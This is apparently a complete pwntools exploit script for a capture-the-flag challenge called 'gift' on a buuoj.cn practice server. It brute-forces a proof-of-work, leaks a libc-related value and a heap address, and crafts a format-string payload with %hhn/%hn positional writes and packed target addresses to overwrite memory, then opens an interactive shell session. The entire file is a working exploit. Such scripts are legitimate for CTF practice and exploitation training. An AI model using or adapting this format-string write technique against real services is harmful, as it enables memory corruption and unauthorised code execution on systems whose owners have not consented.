import base64
import string
from hashlib import sha256

from pwn import *
# Target is a 64-bit Linux binary; set both pwntools context fields at once.
context.update(arch='amd64', os='linux')
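def proof_of_work(sh):
    """Answer the service's proof-of-work prompt on the tube `sh`.

    Reads up to the " == " separator, takes the remainder of that line as the
    expected hex digest, brute-forces a 4-character alphanumeric preimage
    with pwntools' ``mbruteforce`` and sends it after the
    "input your ????>" prompt.

    Args:
        sh: a pwntools tube (``remote``/``process``) positioned at the
            proof-of-work line.

    Returns:
        None. The candidate is written to ``sh``; nothing is returned.

    Note:
        ``mbruteforce`` presumably returns None if no 4-character preimage
        is found, in which case ``sendlineafter`` would fail — the service
        is assumed to always use a 4-character suffix (TODO confirm).
    """
    sh.recvuntil(" == ")
    target_hash = sh.recvline().strip().decode("utf8")

    def matches(candidate):
        # Compare the hex digest of the candidate against the expected one.
        return sha256(candidate.encode()).hexdigest() == target_hash

    # `string` is imported explicitly at file level instead of relying on
    # the `from pwn import *` re-export.
    alphabet = string.ascii_letters + string.digits
    proof = mbruteforce(matches, alphabet, length=4, method='fixed')
    sh.sendlineafter("input your ????>", proof)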
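# Target selection.  The original spawned a local `./gift` process and then
# immediately rebound `r` to the remote connection, leaving the child
# orphaned and never closed.  Keep exactly one live target; the default
# (remote) matches the original's effective behaviour.
LOCAL = False

libc = ELF('./libc-2.23.so')
elf = ELF('./gift')

if LOCAL:
    r = process('./gift')
else:
    r = remote('node4.buuoj.cn', 28706)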
def z():
    """Attach gdb to the module-level target `r` for interactive debugging."""
    target = r
    gdb.attach(target)
if __name__ == '__main__':
    # Printed for reference only: nothing below reads these two GOT entries.
    print('test1:' + hex(elf.got['free']))
    print('test2:' + hex(elf.got['puts']))
    # NOTE(review): the str fill character and str + bytes concatenation
    # below look like they assume Python 2 pwntools (str tubes); on Python 3
    # recv() returns bytes and .ljust(8, '\x00') raises TypeError — confirm
    # the intended interpreter.
    r.sendafter("What's your name?\n", 'nameless')
    r.recvuntil('nameless')
    # Six bytes follow the echoed name; zero-extend to 8 for u64().
    gift = u64(r.recv(6).ljust(8, '\x00'))
    log.success('gift:' + hex(gift))
    r.sendafter("Do you want it?\n", 'Yes\n')
    r.recvuntil("Here is your gift:")
    # The rest of the line after the prompt is parsed as hex; s1..s3 are
    # fixed offsets from it.
    heap = int(r.recvuntil('\n', drop=True), 16) + 8
    s1 = heap + 0x1a0
    s2 = s1 + 2
    s3 = s1 + 4
    log.success('heap:' + hex(heap))
    # Split the (at most 48-bit) leak into three 16-bit pieces; `>>` binds
    # tighter than `&`, so each line is (gift >> k) & 0xffff.
    a = gift >> 32 & 0xffff
    b = gift >> 16 & 0xffff
    c = gift & 0xffff
    log.success('a:' + hex(a))
    log.success('b:' + hex(b))
    log.success('c:' + hex(c))
    # Format string with positional %hhn/%hn conversions; the %c widths are
    # the successive differences b - a and c - b because the written counts
    # are cumulative.
    pd = "%22$hhn%{}c%23$hn%{}c%24$hn%{}c%25$hn".format(a, b - a, c - b)
    print('len' + str(len(pd)))
    # Pad the format string to 0x50 bytes, then append four 8-byte values;
    # presumably these are what the %22$..%25$ positions refer to — verify
    # against the binary's stack layout.
    pd = pd.ljust(0x50, '\x00') + p64(gift - 8) + p64(s3) + p64(s2) + p64(s1)
    r.sendafter("Now,to find your flag in the gift!", pd)
    # Hand the connection over to the user once the payload has been sent.
    r.interactive()